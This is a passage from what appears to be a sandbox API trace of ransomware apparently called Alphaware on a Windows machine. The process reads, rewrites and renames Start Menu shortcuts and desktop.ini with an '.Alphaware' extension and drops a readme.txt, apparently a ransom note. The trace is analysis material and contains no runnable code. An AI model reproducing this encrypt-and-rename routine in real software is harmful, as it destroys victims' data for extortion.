lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed6dcf0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7ed7ee60, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7ee60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2adcf10, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2adcf10, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x85c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft OneDrive.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x80b21c40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x80b21c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0099.922] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x80b21c40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x80b21c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 0 [0099.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0099.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0099.922] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini", dwFileAttributes=0x80) returned 1 [0099.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e778) returned 1 [0099.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x24ef598 | out: lpFileInformation=0x24ef598*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed81570, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1dc)) returned 1 [0099.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e728) returned 1 [0099.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e808) returned 1 [0099.924] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e778) returned 1 [0099.924] ReadFile (in: hFile=0x250, lpBuffer=0x24efa50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x24efa50*, lpNumberOfBytesRead=0x23e8b8*=0x1dc, lpOverlapped=0x0) returned 1 [0099.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e738) returned 1 [0099.948] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6a8) returned 1 [0099.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6a8) returned 1 [0099.951] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e9d0 | out: lpFileInformation=0x23e9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dc4e980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x348)) returned 1 [0099.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e658) returned 1 [0099.952] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\desktop.ini.alphaware")) returned 1 [0099.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7c8) returned 1 [0099.954] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e738) returned 1 [0099.958] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk", dwFileAttributes=0x80) returned 1 [0099.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e778) returned 1 [0099.959] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), fInfoLevelId=0x0, lpFileInformation=0x2572fc0 | out: lpFileInformation=0x2572fc0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed6dcf0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x58b)) returned 1 [0099.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e728) returned 1 [0099.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e808) returned 1 [0099.960] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e778) returned 1 [0099.960] ReadFile (in: hFile=0x250, lpBuffer=0x25738d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x25738d0*, lpNumberOfBytesRead=0x23e8b8*=0x58b, lpOverlapped=0x0) returned 1 [0099.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e738) returned 1 [0099.991] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6a8) returned 1 [0099.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6a8) returned 1 [0099.995] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e9d0 | out: lpFileInformation=0x23e9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dcc0da0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x834)) returned 1 [0099.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e658) returned 1 [0099.995] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk.alphaware")) returned 1 [0099.997] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk", dwFileAttributes=0x80) returned 1 [0099.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e778) returned 1 [0099.999] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23f6790 | out: lpFileInformation=0x23f6790*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7ed7ee60, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7ee60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5ad)) returned 1 [0099.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e728) returned 1 [0099.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e808) returned 1 [0099.999] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e778) returned 1 [0099.999] ReadFile (in: hFile=0x250, lpBuffer=0x23f7080, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x23f7080*, lpNumberOfBytesRead=0x23e8b8*=0x5ad, lpOverlapped=0x0) returned 1 [0100.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e738) returned 1 [0100.024] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6a8) returned 1 [0100.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6a8) returned 1 [0100.027] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e9d0 | out: lpFileInformation=0x23e9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7ed7ee60, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dd0d060, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860)) returned 1 [0100.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e658) returned 1 [0100.027] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk.alphaware")) returned 1 [0100.029] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk", dwFileAttributes=0x80) returned 1 [0100.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e778) returned 1 [0100.030] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\microsoft onedrive.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2479fd8 | out: lpFileInformation=0x2479fd8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf2adcf10, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2adcf10, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x85c)) returned 1 [0100.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e728) returned 1 [0100.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e808) returned 1 [0100.031] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\microsoft onedrive.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0100.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e778) returned 1 [0100.031] ReadFile (in: hFile=0x250, lpBuffer=0x247ab60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x247ab60*, lpNumberOfBytesRead=0x23e8b8*=0x85c, lpOverlapped=0x0) returned 1 [0100.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e738) returned 1 [0100.058] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\microsoft onedrive.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0100.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6a8) returned 1 [0100.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6a8) returned 1 [0100.064] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\microsoft onedrive.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23e9d0 | out: lpFileInformation=0x23e9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2adcf10, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0x8dd7f480, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbf4)) returned 1 [0100.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e658) returned 1 [0100.065] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\microsoft onedrive.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft OneDrive.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\microsoft onedrive.lnk.alphaware")) returned 1 [0100.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0100.066] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8dd7f480, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8dd7f480, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.066] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0100.066] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e851370, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dc4e980, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dcc0da0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x834, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk.Alphaware", cAlternateFileName="INTERN~1.ALP")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7ed7ee60, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8dd0d060, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk.Alphaware", cAlternateFileName="INTERN~2.ALP")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2adcf10, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2adcf10, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0x8dd7f480, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft OneDrive.lnk.Alphaware", cAlternateFileName="MICROS~1.ALP")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dc74ae0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8dc74ae0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8dc74ae0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x80b21c40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x80b21c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0100.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0100.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0100.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0100.067] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, 